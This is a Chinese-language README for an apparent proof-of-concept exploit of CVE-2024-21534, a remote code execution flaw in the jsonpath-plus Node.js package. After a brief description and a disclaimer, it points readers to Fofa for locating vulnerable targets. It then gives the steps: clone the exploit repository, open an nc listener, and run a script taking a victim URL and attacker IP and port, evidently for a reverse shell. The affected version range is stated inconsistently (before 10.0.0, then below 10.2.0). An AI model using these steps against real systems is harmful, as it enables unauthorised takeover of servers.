CVE-2024-21534 是 jsonpath-plus 包 10.0.0 之前版本中的一个严重漏洞。该漏洞源于不当的输入清理,可能导致受影响系统上的远程代码执行(RCE)。此漏洞尤其危险,因为它可以在无需认证的情况下被利用,攻击者可通过发送特制输入在服务器上执行任意代码。该问题源于 Node.js vm 模块的不安全默认用法,一旦被利用,可能会危及整个系统。
jsonpath-plus 版本低于 10.2.0
该漏洞位于 jsonpath-plus 包中,该包广泛用于在应用程序中查询 JSON 数据结构。该缺陷源于不当的输入清理,允许恶意代码执行。
了解详情 — CVE-2024-21534
免责声明:此概念验证(POC)仅用于教育和道德测试目的。在未事先获得双方同意的情况下,使用此工具攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。
要查找潜在目标,请使用 Fofa(类似于 Shodan.io):
Jsonpath-plus
首先,克隆仓库:
git clone https://github.com/verylazytech/CVE-2024-21534
现在使用 nc 打开一个监听器:
nc -lnvp 443
运行漏洞利用代码:
确保 URL 指向一个通过存在漏洞的 jsonpath-plus 包处理用户输入的端点,这样才能利用 RCE 漏洞。
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

